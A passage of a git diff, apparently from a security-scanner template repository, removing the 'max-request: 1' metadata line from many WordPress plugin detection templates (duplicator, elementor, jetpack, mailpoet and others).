a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 